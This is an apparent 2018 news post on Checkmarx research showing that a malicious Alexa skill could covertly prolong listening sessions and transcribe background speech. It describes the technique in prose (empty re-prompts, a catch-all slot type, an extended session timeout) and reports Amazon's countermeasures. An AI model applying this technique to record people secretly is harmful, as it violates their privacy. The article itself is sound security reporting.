Posted on May 1, 2018 at 5:13 PM
Amazon’s well-known virtual assistant based on the cloud technology, Alexa, which was developed for Amazon Echo, can be illegally used for listening in on its users. This discovery came recently from the security researchers of Checkmarx.
If you were wondering just how popular Alexa virtual assistant really is, let’s just say that “she” is present on over 31 million different devices, spread out around the world. After detecting a wake-up phrase (“Alexa”), the user interaction is enabled. Then the IPA (Intelligent Personal Assistant) can start launching requested apps or capabilities. These are commonly known as skills, and they can come already built into the device or can be installed from the Skills Store.
How does this work?
As a part of their experiment, researchers from Checkmarx managed to create a malicious skill. When installed, this application can record the speech from the background, all without user’s awareness. However, since the wake-up phrase is needed for the device to start working, the recording of any speech can only be done after the device was activated.
The problem lies in the fact that the so-called “listening session”, which usually ends after the device delivers the response, doesn’t end if this malicious skill is installed. The session remains active, and the user is completely unaware of the fact that their device keeps recording everything they say.
Usually, the “ShouldEndSession” flag lets a single session to remain alive for an extra cycle, even after the response was delivered to the user. However, the act of delivering this response, which includes reading back the text from the service will show that device still listens. This is something that the researchers tried and eventually managed to overcome by using a re-prompt feature.
The feature works mostly the same, but the difference is that it also accepts empty re-prompts. Basically, an entirely new cycle starts going, while the user is not alerted to this.
After resolving this issue, the researchers had to try and find a way to transcribe the voice that the malicious skill recorded. To do so, they implemented a completely new slot-type, which can capture any and all words that are spoken in device’s presence. The slot is not even limited to only a specific list of previously defined words. Another thing that the researchers did was creating a new formatted string, which works for pretty much any possible length.
Is there no way of knowing that the device is recording?
Usually, when the device activates and starts listening to the user, it would turn on a very bright blue light, which serves as a visual indicator. However, there have been several of the AVS (Alexa Voice Services) vendors that are capable of using the virtual assistant without any visual indicators. Of course, there is always a possibility that the user would simply oversee the light.
The researchers said that the light is a good indicator that the device is working. However, the nature of these devices is different than the nature of smartphones or similar devices. Basically, you don’t have to look at it in order to use it. You can just put it in some corner of the room, and use it when you have the need. Since operating it is voice-based, the user might not even see the light that is still on, indicating that the device continues the listening session.
The session will continue for as long as the device can hear speech and recognize individual words that can be recorded. If the device only registers silence, Alexa will usually end the session after 8 seconds. However, through the malicious skill, this period is prolonged to 16 seconds.
After the researchers made the discovery, Amazon was contacted and Checkmarx’s findings were quickly delivered. The companies are working together to overcome the risks right now. Special criteria were included that are supposed to recognize skills that might be used for eavesdropping, and reject them. Also, the devices will now become sensitive to any long sessions, as well as empty-reprompts that might indicate the unusual activities of the device.
The demonstration of how the eavesdropping might work was published by researchers in a form of this video.